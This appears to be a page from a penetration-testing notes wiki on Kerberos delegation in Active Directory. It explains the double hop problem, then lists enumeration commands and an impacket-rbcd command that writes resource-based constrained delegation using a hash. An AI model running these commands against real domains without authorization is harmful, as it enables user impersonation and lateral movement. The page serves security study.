Delegation

Last updated 1 year ago

Was this helpful?

Delegation

All information found below has been adapted from and its corresponding .

TL;DR

Access tokens represent the local security context of a user, are cached in LSASS (), and they are tied to a logon session's ID. Therefore, both the access token and the logon session exist on the same host (Figure 1)

Credentials represent the network security context of a user (hashes, tickets, etc.) and are tied to a logon session. Thus, if a user authenticates to an application with its access token, and then the application needs to authenticate to a remote server, the double hop problem arises (Figure 2).

Delegation aims to solve the double hop issue by allowing services to impersonate users, not only locally, but in the network. In brief, the user sends its "whole" credentials to the server, which results in a similar situation as if the user and the server were residing on the same host (Figure 3).

Kerberos delegations allow services to impersonate domain users in order to access another service and include 3 types:

Attack

Enumerate.

findDelegation.py '<domain>/<user>':'<pass>' -user <account>

# TrustedForDelegation -> KUD, TrustedToAuthForDelegation -> KCD+PT
# AllowedToDelegateTo -> KCD-PT, PrincipalsAllowedToDelegateTo -> RBCD
Get-ADComputer <account> -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

# assign delegation
impacket-rbcd '<domain>/<user>' -hashes <:hash> -k -delegate-from <account> -delegate-to <account> -action write -dc-ip <hostname> -use-ldaps
# check delegation
impacket-findDelegation '<domain>/<user>':'<pass>' -dc-ip <ip> -k

Resources

PreviousDCSync NextUnconstrained

Last updated 1 year ago

Was this helpful?